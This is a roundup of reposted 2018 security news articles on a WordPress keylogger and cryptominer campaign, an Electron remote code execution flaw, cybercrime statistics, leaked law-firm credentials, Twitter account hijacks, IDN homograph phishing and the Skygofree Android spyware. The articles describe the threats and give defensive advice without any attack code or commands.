Nearly 2000 WordPress Websites Infected with a Keylogger

More than 2,000 WordPress websites have once again been found infected with a piece of crypto-mining malware that not only steals the resources of visitors' computers to mine digital currencies but also logs visitors' every keystroke.
Security researchers at Sucuri discovered a malicious campaign that infects WordPress websites with a malicious script that delivers an in-browser cryptocurrency miner from CoinHive and a keylogger.

Coinhive is a popular browser-based service that offers website owners to embed a JavaScript to utilise CPUs power of their website visitors in an effort to mine the Monero cryptocurrency.

Sucuri researchers said the threat actors behind this new campaign is the same one who infected more than 5,400 Wordpress websites last month since both campaigns used keylogger/cryptocurrency malware called cloudflare[.]solutions.

Spotted in April last year, Cloudflare[.]solutions is cryptocurrency mining malware and is not at all related to network management and cybersecurity firm Cloudflare. Since the malware used the cloudflare[.]solutions domain to initially spread the malware, it has been given this name.

The malware was updated in November to include a keylogger. The keylogger behaves the same way as in previous campaigns and can steal both the site's administrator login page and the website's public facing frontend.

If the infected WordPress site is an e-commerce platform, hackers can steal much more valuable data, including payment card data. If hackers manage to steal the admin credentials, they can just log into the site without relying upon a flaw to break into the site.

The cloudflare[.]solutions domain was taken down last month, but criminals behind the campaign registered new domains to host their malicious scripts that are eventually loaded onto WordPress sites.
The new web domains registered by hackers include cdjs[.]online (registered on December 8th), cdns[.]ws (on December 9th), and msdns[.]online (on December 16th).

Just like in the previous cloudflare[.]solutions campaign, the cdjs[.]online script is injected into either a WordPress database or the theme's functions.php file. The cdns[.]ws and msdns[.]online scripts are also found injected into the theme's functions.php file.

The number of infected sites for cdns[.]ws domain include some 129 websites, and 103 websites for cdjs[.]online, according to source-code search engine PublicWWW, though over a thousand sites were reported to have been infected by the msdns[.]online domain.
Researchers said it's likely that the majority of the websites have not been indexed yet.

"While these new attacks do not yet appear to be as massive as the original Cloudflare[.]solutions campaign, the reinfection rate shows that there are still many sites that have failed to properly protect themselves after the original infection. It’s possible that some of these websites didn't even notice the original infection," Sucuri researchers concluded.

If your website has already been compromised with this infection, you will require to remove the malicious code from theme's functions.php and scan wp_posts table for any possible injection.
Users are advised to change all WordPress passwords and update all server software including third-party themes and plugins just to be on the safer side.


Source:
 The HackerNews 

Critical Flaw Hits Popular Windows Apps Built With Electron JS Framework

A critical remote code execution vulnerability has been reported in Electron—a popular web application framework that powers thousands of widely-used desktop applications including Skype, Signal, Wordpress and Slack—that allows for remote code execution.
Electron is an open-source framework that is based on Node.js and Chromium Engine and allows app developers to build cross-platform native desktop applications for Windows, macOS and Linux, without knowledge of programming languages used for each platform.


The vulnerability, assigned as the number CVE-2018-1000006, affects only those apps that run on Microsoft Windows and register themselves as the default handler for a protocol like myapp://.
"Such apps can be affected regardless of how the protocol is registered, e.g. using native code, the Windows registry, or Electron's app.setAsDefaultProtocolClient API," Electron says in an advisory published Monday.
The Electron team has also confirmed that applications designed for Apple's macOS and Linux are not vulnerable to this issue, and neither those (including for Windows) that do not register themselves as the default handler for a protocol like myapp://.
The Electron developers have already released two new versions of their framework, i.e. 1.8.2-beta.4, 1.7.11, and 1.6.16 to address this critical vulnerability.

"If for some reason you are unable to upgrade your Electron version, you can append—as the last argument when calling app.setAsDefaultProtocolClient, which prevents Chromium from parsing further options," the company says.

End users can do nothing about this vulnerability; instead, developers using Electron JS framework have to upgrade their applications immediately to protect their user base.

Much details of the remote code execution vulnerability have not been disclosed yet, neither the advisory named any of the vulnerable apps (that make themselves the default protocol handler) for security reason.
We will update you as soon as any details about the flaw come out.



Source:  TheHacker News 

The $6bn Crime: 17 Million UK Consumers Hit Last Year

Cybercrime cost 17 million UK consumers an estimated £4.6bn ($6bn) last year, according to Symantec.

The vendor polled over 21,000 adults across 21 markets, including 1000 in the UK, to compile its 2017 Norton Cyber Security Insights Report.

Globally, cyber-criminals stole £130bn ($172bn) from 978 million consumers in those countries.

The UK’s mature online economy contributed a hefty chunk of the £20.7bn taken from 98.2 million European consumers during the period. Even more telling, each victim of cybercrime is said to have lost nearly two working days (14.8 hrs) dealing with the aftermath of the incident.

Just one in 12 UK consumers suffered a ransomware file lock-down, with over a fifth (22%) failing to regain access to their data despite paying the ransom.

The 44% of total British netizens that claimed never to back-up could be playing a risky game.

“Handing the hackers money simply continues to fund their efforts with no guarantee that you’ll personally be able to regain access to your digital life,” warned Nick Shaw, general manager of Norton EMEA. “In the case of ransomware, crime pays, and we can all take some simple steps to thwart their efforts.”

Tellingly, cybercrime victims were more likely to use the same online password across all their accounts: 20% versus 12% of non-victims.

Cybercrime is becoming more frequent: 60% of those who have suffered an attack in the past were hit in the past year, including 37% who handed over info after being phished, 40% who had their home Wi-Fi cracked, a third who were conned into fraudulent purchases and more than a quarter who fell for tech support scams.

Yet 28% of UK victims think they’re able to protect their data from future attacks and 26% think they’re at low risk of being hit again, according to the report.

“Consumers’ actions revealed a dangerous disconnect: despite a steady stream of cybercrime sprees reported by media, too many people appear to feel invincible and skip taking even basic precautions to protect themselves,” said Shaw. “This disconnect highlights the need for consumer digital safety and the urgency for consumers to get back to basics when it comes to doing their part to prevent cybercrime.”

Source:  Info-Security 

UK’s Top Law Firms at Risk After 1m+ Credentials Found on Dark Web

The UK’s top law firms are at serious risk of unauthorized network intrusions after new research revealed over one million breached credentials on the dark web.

RepKnight studied 620 domains belonging to 500 of the UK’s law firms and found 1.16 million corporate email addresses on various sites which collect previously stolen or leaked credentials.

What’s more, more than half of these had been posted in the past six months, and 80% had an associated password – often available in clear text or hashed values which can be easily cracked, the vendor claimed.

“This puts those staff – and the law firm’s network – at significant risk from ‘credential stuffing’ attacks, where bots are used to repeatedly try the same username and password on multiple sites,” the report continued. “Perhaps more serious are ‘spear phishing’ attacks or identity fraud, where those credentials are used as part of a targeted cyber-attack on that individual.”

The vast majority of these credentials were taken from third-party breaches such as the one at LinkedIn, where law firm employees had signed up with their work credentials.

However, their appearance on dark web sites with associated passwords plunges their employers into a potentially alarming situation, if those credentials are used to access the corporate network, craft spear-phishing emails loaded with malware, or even attempt CEO fraud.

Any leaks of highly sensitive client or employee data could result in heavy fines under the GDPR.

The legal sector is coming under increasing scrutiny from cyber-criminals looking to tap the wealth of lucrative information such firms hold.

A quarter (24%) of SME-sized firms in the sector suffered a cyber-attack last year, with the figure rising to 36% for London-based companies, according to NatWest.

Meanwhile, two major US law firms were hacked in 2016 for information subsequently used in a $4m insider trading scam.

Both the Panama Papers and Paradise Papers leaks also came about after offshore law firms were targeted.

Source:  Info-Security 

High-Profile Twitter Accounts Hit by Turkish Propaganda Campaign

A Twitter campaign purportedly carried out by Turkish hacker group ‘Ayyildiz Tim’ has targeted the accounts of several high-profile individuals to spread political propaganda, according to McAfee.

In a blog post on the firm’s website Christiaan Beek, lead scientist & principal engineer, and Raj Samani, chief scientist and McAfee fellow, explained that upon investigating the recent events McAfee Advanced Threat Research discovered the Twitter account of the Indian ambassador to the United Nations was taken over on January 13 and used to spread pro-Pakistan and pro-Turkey postings.

“What seemed to be a single event soon became a targeted campaign that we discovered in cooperation with our partner SocialSafeGuard,” the pair wrote, with the accounts of Borge Brende, president of the World Economic Forum, Eric Bolling and Greta Van Susteren, both of Fox News, also targeted.

“Once the accounts were compromised, the attackers direct-messaged the account contacts with propaganda for their cause or with a link to convince them to click on a phishing site that would harvest the Twitter credentials of the victim.”

When looking at the source code of the malicious pages, McAfee found several Turkish-language segments, with ‘Ayyildiz Tim’ claiming responsibility for the attacks.

“There is also evidence that private messaging history has been accessed from certain compromised accounts of prominent figures, along with other sensitive or confidential information such as private phone numbers and emails,” McAfee added.

“These tactics demonstrate the use of authority and social validation as subconscious levers to invoke victim interaction,” Samani told Infosecurity. “Whilst these methods are typical for email, Twitter is a relatively new channel for such activities.

“Twitter users – or anyone using social media – should always be wary of the potential for criminals to take control of their account. This news proves the importance of double checking that the appropriate security controls are in place. Using Twitter’s log in verification is an essential extra layer of security that could well prevent many successful attacks.”

Source:  info- security 

Report Details 100+ Domains at Risk from IDN-Related Spoofing

Researchers have warned of a major phishing threat posed by domain names spoofed using International Domain Name (IDN) homographs.

Attackers can use IDN characters to mimic Latin script, and thus lure unsuspecting users into visiting phishing sites that are “pixel-perfect renditions of the brands they’re impersonating,” according to Farsight Security.

While the security challenges around IDNs are well known, the firm conducted its own research into the area, revealing several real-world examples to underline the scale of the problem.

From October 17 2017 to January 10 2018 the firm observed 125 top domains being subverted by over 116,000 homographs.

“We observed IDN homographs mimicking 125 top ‘phish-worthy’ domains including large content providers, social networking giants, financial websites, luxury brands, cryptocurrency exchanges, and other popular websites,” explained the vendor’s Mike Schiffman.

One example is a phishing site using IDN characters to spoof "Facebook."

Other big name brands affected included Apple, Adobe, Amazon, Bank of America, Cisco, Coinbase, Credit Suisse, eBay, Bittrex, Google, Microsoft, Netflix, New York Times, Twitter, Walmart, Yahoo, Wikipedia, YouTube and Yandex.

From an end-user perspective the best form of defense is to be suspicious of any unsolicited email regardless of sender — especially ones featuring enticing statements or account log-in links.

Enabling phishing filters, safe browsing and 2FA for log-ins will also help to combat the risk of phishing and account hijacking.

“If you operate a popular website that allows users to interact with one another, log in, purchase and/or download things, chances are your brand (and therefore your users) will be on some target list for phishers and other internet criminals,” continued Schiffman.

“You will want to pay attention to the IDN space, and either try to register IDN domain names proactively that could be used to impersonate your brand, or subscribe to a service that allows you to monitor recent IDN homograph registration and use in an attempt to impersonate your brand.”

Source:  Info-Security 

Skygofree — Powerful Android Spyware Discovered

Security researchers have unveiled one of the most powerful and highly advanced Android spyware tools that give hackers full control of infected devices remotely.
Dubbed Skygofree, the Android spyware has been designed for targeted surveillance, and it is believed to have been targeting a large number of users for the past four years.

Since 2014, the Skygofree implant has gained several novel features previously unseen in the wild, according to a new report published by Russian cybersecurity firm Kaspersky Labs.

The 'remarkable new features' include location-based audio recording using device's microphone, the use of Android Accessibility Services to steal WhatsApp messages, and the ability to connect infected devices to malicious Wi-Fi networks controlled by attackers.

Skygofree is being distributed through fake web pages mimicking leading mobile network operators, most of which have been registered by the attackers since 2015—the year when the distribution campaign was most active, according to Kaspersky's telemetry data.

Italian IT Firm Behind Skygofree Spyware?

Researchers at Kaspersky Lab believe the hacker or hacking group behind this mobile surveillance tool has been active since 2014 and are based in Italy—the home for the infamous 'Hacking Team'—one of the world's bigger players in spyware trading.

"Given the many artifacts we discovered in the malware code, as well as infrastructure analysis, we are pretty confident that the developer of the Skygofree implants is an Italian IT company that works on surveillance solutions, just like HackingTeam," said the report.

Kaspersky found several Italian devices infected with Skygofree, which the firm described as one of the most powerful, advanced mobile implants it has ever seen.

Although the security firm has not confirmed the name of the Italian company behind this spyware, it found multiple references to Rome-based technology company "Negg" in the spyware's code. Negg is also specialised in developing and trading legal hacking tools.

Skygofree: Powerful Android Spyware Tool

Once installed, Skygofree hides its icon and starts background services to conceal further actions from the user. It also includes a self-protection feature, preventing services from being killed.

As of October last year, Skygofree became a sophisticated multi-stage spyware tool that gives attackers full remote control of the infected device using a reverse shell payload and a command and control (C&C) server architecture.

According to the technical details published by researchers, Skygofree includes multiple exploits to escalate privileges for root access, granting it ability to execute most sophisticated payloads on the infected Android devices.

One such payload allows the implant to execute shellcode and steal data belonging to other applications installed on the targeted devices, including Facebook, WhatsApp, Line, and Viber.
"There are multiple, exceptional capabilities: usage of multiple exploits for gaining root privileges, a complex payload structure, [and] never-before-seen surveillance features," the researchers said.

Skygofree’s control (C&C) server also allows attackers to capture pictures and videos remotely, seize call records and SMS, as well as monitor the users' geolocation, calendar events and any information stored in the device's memory.

Besides this, Skygofree also can record audio via the microphone when the infected device was in a specified location and the ability to force the infected device to connect to compromised Wi-Fi networks controlled by the attacker, enabling man-in-the-middle attacks.

The spyware uses "the Android Accessibility Service to get information directly from the displayed elements on the screen, so it waits for the targeted application to be launched and then parses all nodes to find text messages," Kaspersky said.

Kaspersky researchers also found a variant of Skygofree targeting Windows users, suggesting the authors' next area of interest is the Windows platform.

The best way to prevent yourself from being a victim is to avoid downloading apps via third-party websites, app stores or links provided in SMS messages or emails.

Source:  The Hacker News